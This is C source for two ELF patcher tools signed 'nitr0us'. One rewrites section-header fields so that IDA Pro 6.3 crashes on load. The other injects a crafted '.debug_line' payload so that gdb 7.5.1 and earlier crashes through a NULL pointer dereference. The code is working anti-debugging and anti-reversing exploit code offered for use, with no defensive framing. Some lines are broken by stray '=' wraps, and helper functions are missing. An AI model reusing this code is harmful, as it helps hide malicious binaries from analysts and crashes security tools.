int main(int argc, char **argv)
{
Elf32_Ehdr*header;
Elf32_Halfnew_shnum;
Elf32_Halfnew_shstrndx;
intfd;
printf("######################################################\n");
printf("# #\n");
printf("# IDA Pro 6.3 - ELF anti-debugging/reversing patcher #\n");
printf("# -nitr0us- #\n");
printf("# #\n");
printf("######################################################\n\n");
if(argc < 2){
fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
if(!isELF(fd)){
close(fd);
exit(-1);
}
// Mapping to memory only the necessary bytes [sizeof(header)]
if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}
printf("[*] The ELF file originally has:\n");
printf("[-] Ehdr->e_shnum: %5d (0x%.4x)\n", header->e_shnum, header->=
e_shnum);
printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", header->e_shstrndx, hea=
der->e_shstrndx);
printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);
srand(time(NULL)); // seed for rand()
new_shnum = (Elf32_Half) rand() % 0x1337;
new_shstrndx = (Elf32_Half) 0;
while(new_shstrndx < new_shnum)
new_shstrndx = (Elf32_Half) rand() % 0xDEAD;
header->e_shnum = new_shnum;
header->e_shstrndx = new_shstrndx;
// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}
close(fd);
munmap(header, 0);
printf("[*] The patched ELF file now has:\n");
printf("[+] Ehdr->e_shnum: %5d (0x%.4x)\n", new_shnum, new_shnum);
printf("[+] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", new_shstrndx, new_shstr=
ndx);
printf("[*] IDA Pro 6.3 should crash trying to load \"%s\"\n", argv[1]);
return 0;
}
int main(int argc, char **argv)
{
printf("######################################################\n");
printf("# #\n");
printf("# gdb (GNU debugger) <= 7.5.1 #\n");
printf("# (crash due a NULL pointer dereference) #\n");
printf("# #\n");
printf("# ELF anti-debugging/reversing patcher #\n");
printf("# -nitr0us- #\n");
printf("# #\n");
printf("######################################################\n\n");
if(argc < 2){
fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
if(!isELF(fd)){
close(fd);
exit(-1);
}
if(fstat(fd, &statinfo) == -1){
perror("stat");
close(fd);
exit(-1);
}
if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}
header = (Elf32_Ehdr *) (elfptr);
if(header->e_shoff == 0){
fprintf(stderr, "[!] \"%s\" doesn't have a Section Header Table !\n", argv[1]);
close(fd);
munmap(elfptr, 0);
exit(-1);
}
sht = (Elf32_Shdr *) (elfptr + header->e_shoff);
printf("[*] The ELF file originally has: %d (0x%.4x) bytes\n", (int) statinfo.st_size, (int) statinfo.st_size);
printf("[-] Ehdr->e_shnum: %5d (0x%.4x)\n", header->e_shnum, header->e_shnum);
printf("[-] Ehdr->e_shoff: %5d (0x%.4x)\n", header->e_shoff, header->e_shoff);
printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n", header->e_shstrndx, header->e_shstrndx);
// Find the Section Header corresponding to the
// "Section Header String Table" to get the file offset from there
shstrtab_section = (Elf32_Shdr *)(elfptr + header->e_shoff + header->e_shstrndx * sizeof(Elf32_Shdr));
if((shstrtab_size = shstrtab_section->sh_size) > 0)
if(!(shstrtab_offset = shstrtab_section->sh_offset)){
fprintf(stderr, "[!] shstrtab_section->sh_offset is 0 (cero) !\n");
close(fd);
munmap(elfptr, 0);
exit(-1);
}
printf("[-] shstrtab_offset: %5d (0x%.4x)\n", (int) shstrtab_offset, (int) shstrtab_offset);
printf("[-] shstrtab_size : %5d (0x%.4x)\n\n", (int) shstrtab_size, (int) shstrtab_size);
printf("[*] Looking for the '.debug_line' section...\n\n");
if(!(debug_line_offset = findDebugLineSection())){
printf("[-] '.debug_line' section was not found in the Section Header Table !\n");
printf("[*] Adding the '.debug_line' with the payload inside\n\n");
if(!addDebugLineSection()){
fprintf(stderr, "[!] The '.debug_line' section couldn't be added. Sorry !\n\n");
close(fd);
munmap(elfptr, 0);
exit(-1);
}
printf("[+] The '.debug_line' section was added successfully with the payload inside\n\n");
if(rename("modified_elf.tmp", argv[1]) == -1)
perror("rename");
} else {
printf("[+] '.debug_line' section was found at offset %5d (0x%.4x) within the file\n", (int) debug_line_offset, (int) debug_line_offset);
printf("[*] '.debug_line' size = %5d bytes\n", (int) s_debug_line_size);
if(s_debug_line_size < sizeof(dwarf_line_header)){
fprintf(stderr, "[!] '.debug_line' section is smaller than the payload to be injected (%d bytes)\n\n", (int) sizeof(dwarf_line_header));
exit(-1);
} else
printf("[*] '.debug_line' section has enough space for the payload (%d bytes)\n\n", (int) sizeof(dwarf_line_header));
printf("[*] Overwriting its content with the payload\n\n");
memcpy(elfptr + debug_line_offset, dwarf_line_header, sizeof(dwarf_line_header));
}
// Synchronize the ELF in file system with the previous memory mapped
if(msync(elfptr, 0, MS_SYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}
close(fd);
munmap(elfptr, 0);
printf("[*] \"%s\" is now completely patched\n", argv[1]);
printf("[*] gdb (GNU debugger) <= 7.5.1 should crash trying to load \"%s\"\n", argv[1]);
return 0;
}
